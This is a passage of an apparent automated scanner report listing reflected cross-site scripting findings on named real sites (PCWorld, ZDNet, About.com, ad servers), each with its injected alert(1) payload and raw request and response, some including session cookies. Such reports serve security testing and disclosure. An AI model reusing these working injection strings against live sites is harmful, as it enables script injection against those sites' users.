Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 2061608789
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2011/may/12/heder-here-in-this-spp-pppppb694c"><script>alert(1)</script>1fa13f77dcf/" method="post" id="loginform1">
...[SNIP]...

2.130. http://www.pcworld.com/pcworldconnect/comment_registration [callingurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The value of the callingurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125d0"><img%20src%3da%20onerror%3dalert(1)>0753613c8b936b7cc was submitted in the callingurl parameter. This input was echoed as 125d0"><img src=a onerror=alert(1)>0753613c8b936b7cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /pcworldconnect/comment_registration?callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html125d0"><img%20src%3da%20onerror%3dalert(1)>0753613c8b936b7cc HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=41732781CC4F99C762F0377664240A50; fsr.a=1305206922003; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:30:21 GMT
Server: Apache
X-GasHost: gas1
X-Cooking-With: Gasoline-Proxy
X-GasOriginRetry: 0
X-GasOriginTime: 0
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=37DBA5BF4885B3CA496B7FAFE45B1DC7; Path=/
Vary: Accept-Encoding
Content-Length: 6275


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<input type="hidden" id="callingurl" name="callingurl" value="http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html125d0"><img src=a onerror=alert(1)>0753613c8b936b7cc" />
...[SNIP]...

2.131. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbf8f'-alert(1)-'4b23fb4be7c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773fbf8f'-alert(1)-'4b23fb4be7c HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:55 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:29:55 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 100861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<script type="text/javascript">
(function() {
var toolbar = new CNB.Toolbar('toolbar-207595', {
'cid': '207595',
'serviceCid': 'desktop_5773fbf8f'-alert(1)-'4b23fb4be7c',
'title': 'Can Intel Cedar Trail Atom processors, along with Google Chromebooks, resurrect the netbook?',
'summary': 'Pity the poor netbook. Once tech&rsquo;s darling, it&rsquo;s been
...[SNIP]...

2.132. http://www.zdnet.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 937ea"><a>15ddfa8a42c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /937ea"><a>15ddfa8a42c HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1; __utmz=11603627.1305206897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11603627.345061338.1305206897.1305206897.1305206897.1; __utmc=11603627; __utmb=11603627.2.10.1305206897; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10087&ASK05540_10174&ASK05540_10185&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10283&ASK05540_10287&ASK05540_10290&ASK05540_10319&ASK05540_10342&ASK05540_10343&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10432&ASK05540_10458&ASK05540_10537&ASK05540_10538&ASK05540_10562&ASK05540_10265&ASK05540_10166&ASK05540_10249&ASK05540_10263&ASD08734_72078; __csref=; __cst=78ae66beea02e0ce; __csv=6522d442e56f04a6|0; __csnv=614cd52b5cceb9eb; __ctl=6522d442e56f04a61; XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 13:32:19 GMT
Server: Apache
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 44036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<link rel="canonical" href="http://www.zdnet.com/937ea"><a>15ddfa8a42c" />
...[SNIP]...

2.133. http://z.about.com/6g/ip/284/27.htm [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://z.about.com
Path:   /6g/ip/284/27.htm

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eee74'%3balert(1)//693455e81fa was submitted in the s parameter. This input was echoed as eee74';alert(1)//693455e81fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6g/ip/284/27.htm?s=urbanlegendseee74'%3balert(1)//693455e81fa HTTP/1.1
Host: z.about.com
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; jsc=13; Mint=B5CDUi2520kA1h03; zBT=1; pc=1; zFD=B5C1B5310B50220B00202; zRf=-2; gs=urbanlegends

Response

HTTP/1.1 200 OK
Age: 1
Date: Thu, 12 May 2011 13:33:11 GMT
Expires: Thu, 12 May 2011 14:33:11 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
ETag: "KXDIJCDIDLXSXXPPP"
Server: Apache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html
Content-Length: 1385

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>About.com Special Features</title></head>

<style>html, body, div, span, h3, h
...[SNIP]...
<script type="text/javascript">function zr(m){return Math.floor(Math.random()*99999)%m}
zDL=new Date();zTbC=0;gs='urbanlegendseee74';alert(1)//693455e81fa';ch='';
function zT(l,p){m=new Date(),n=m.getTime()-zDL.getTime(),u='_',t=l.href;l.href='http://clk.about.com/?zi='+p+'&sdn='+gs+'&cdn='+ch+'&tm='+Math.round(n/1000)+(zTbC?'&acs='+zTbC:'')+'&bts=1&zu=
...[SNIP]...

2.134. http://adserving2.cpxinteractive.com/st [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1400'-alert(1)-'26e8be3e852 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f1400'-alert(1)-'26e8be3e852
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:28 GMT
Content-Length: 604

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=1588565&referrer=http://www.google.com/search%3Fhl=en%26q=f1400'-alert(1)-'26e8be3e852&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1588565">
...[SNIP]...

2.135. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74cb2"><a>261d8688779 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: 74cb2"><a>261d8688779

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:58 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:28:58 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 111029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/r=8041&amp;sg=505129&amp;o=6037%253A13616%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2100&amp;nd=13616&amp;pid=&amp;cid=207595&amp;pp=100&amp;e=&amp;rqid=01c13-ad-e7:4DCB7DA94F2C06&amp;orh=74cb2"><a>261d8688779&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=74cb2">
...[SNIP]...

2.136. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a3d"><a>e333a2fc2f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: 24a3d"><a>e333a2fc2f5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:32 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:28:32 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 111103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/i/r=9953&amp;sg=1815&amp;o=6037%253A13616%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2100&amp;nd=13616&amp;pid=&amp;cid=207595&amp;pp=100&amp;e=&amp;rqid=00c13-ad-e2:4DCB83254AEF44&amp;orh=24a3d"><a>e333a2fc2f5&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=24a3d">
...[SNIP]...

2.137. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload 3bca7<script>alert(1)</script>045da951e20 was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=130145721913036138033bca7<script>alert(1)</script>045da951e20; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:06 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-06_15024998381305207306; expires=Tue, 10-May-2016 13:35:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_15024998381305207306; expires=Thu, 12-May-2011 13:50:06 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='130145721913036138033bca7<script>alert(1)</script>045da951e20';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15024998381305207306';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTca
...[SNIP]...

2.138. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 68287<script>alert(1)</script>04ab1212fa was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=207615189 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_3PC=168287<script>alert(1)</script>04ab1212fa; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:33:33 GMT
Content-Type: application/x-javascript
Connection: close
